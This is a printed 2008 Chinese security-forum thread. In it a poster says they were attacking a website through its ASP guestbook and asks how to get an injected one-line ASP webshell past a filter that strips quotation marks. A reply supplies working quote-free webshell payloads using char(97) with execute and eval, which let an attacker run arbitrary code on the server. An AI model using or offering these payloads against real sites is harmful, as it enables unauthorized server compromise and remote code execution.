标题:
[讨论]关于一句话如果绕过网站的过滤限制
[打印本页]
作者:
冰绿茶
时间:
2008-7-21 00:11
标题:
[讨论]关于一句话如果绕过网站的过滤限制
[讨论]关于一句话如果绕过网站的过滤限制
议题作者:kyo-esr
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
今天碰到一个棘手的问题,日一个站日了半天愣是没有办法,都是静态页面,最后google了一下,竟然有asp的留言版~~
直接插入一句话,留完言后一看, <%execute request("value")%>给过滤成<%execute request("value")
[localimg=400,46]截图[/localimg]
晕,以前碰到的都是直接过滤了百分号的,这次过滤了引号,头一次遇到
"过滤成了"
改怎么改写一句话才能绕过?
thk
附件
1.jpg
(78.8 KB)
2008-6-4 16:10
i am the bird...
帖子1 精华
0
积分3 阅读权限40 性别男 来自none 在线时间3 小时 注册时间2006-8-26 最后登录2008-6-4
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
benben
晶莹剔透§烈日灼然
作者:
ic369
时间:
2008-7-21 00:12
过滤引号是可以搞定的,你下!
帖子1 精华
0
积分3 阅读权限40 在线时间0 小时 注册时间2005-6-17 最后登录2008-6-5
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
miao2
﹎'颓废小猫;
晶莹剔透§烈日灼然
作者:
山冈分
时间:
2008-7-21 00:12
<%execute request(char(97))%>
<%eval request(char(97))%>
帖子26 精华
2
积分89 阅读权限40 性别男 在线时间102 小时 注册时间2007-7-28 最后登录2008-7-19
查看详细资料
引用
报告
回复
TOP
软件项目外包
小胖子
Calm
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2